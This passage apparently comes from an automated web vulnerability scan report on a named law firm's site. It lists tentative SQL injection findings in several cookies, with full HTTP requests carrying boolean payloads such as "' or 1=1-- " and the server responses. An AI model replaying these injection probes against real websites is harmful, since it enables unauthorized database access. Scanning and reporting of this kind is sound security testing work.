Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953722027432%20or%201%3d2--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11820711;path=/
Set-Cookie: CFTOKEN=70141327;path=/
Date: Thu, 12 May 2011 16:45:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.61. http://www.pillsburylaw.com/index.cfm [CFTOKEN cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 10511659%20or%201%3d1--%20 and 10511659%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898810511659%20or%201%3d1--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 12-May-2010 16:46:07 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898810511659%20or%201%3d2--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11820727;path=/
Set-Cookie: CFTOKEN=16431562;path=/
Date: Thu, 12 May 2011 16:46:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.62. http://www.pillsburylaw.com/index.cfm [MEDIAUSERID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The MEDIAUSERID cookie appears to be vulnerable to SQL injection attacks. The payloads 99273307'%20or%201%3d1--%20 and 99273307'%20or%201%3d2--%20 were each submitted in the MEDIAUSERID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=99273307'%20or%201%3d1--%20; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERID=;expires=Wed, 12-May-2010 16:46:32 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=99273307'%20or%201%3d2--%20; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.63. http://www.pillsburylaw.com/index.cfm [MEDIAUSERNAME cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The MEDIAUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 19279791'%20or%201%3d1--%20 and 19279791'%20or%201%3d2--%20 were each submitted in the MEDIAUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=19279791'%20or%201%3d1--%20; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERNAME=;expires=Wed, 12-May-2010 16:46:38 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=19279791'%20or%201%3d2--%20; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.64. http://www.pillsburylaw.com/index.cfm [PCONNECTID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The PCONNECTID cookie appears to be vulnerable to SQL injection attacks. The payloads 56145523'%20or%201%3d1--%20 and 56145523'%20or%201%3d2--%20 were each submitted in the PCONNECTID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=56145523'%20or%201%3d1--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCONNECTID=;expires=Wed, 12-May-2010 16:46:14 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=56145523'%20or%201%3d2--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 16:46:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</s
...[SNIP]...

1.65. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The PCUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 11780295'%20or%201%3d1--%20 and 11780295'%20or%201%3d2--%20 were each submitted in the PCUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=11780295'%20or%201%3d1--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:26 GMT
Server: Microsoft-IIS/6.0
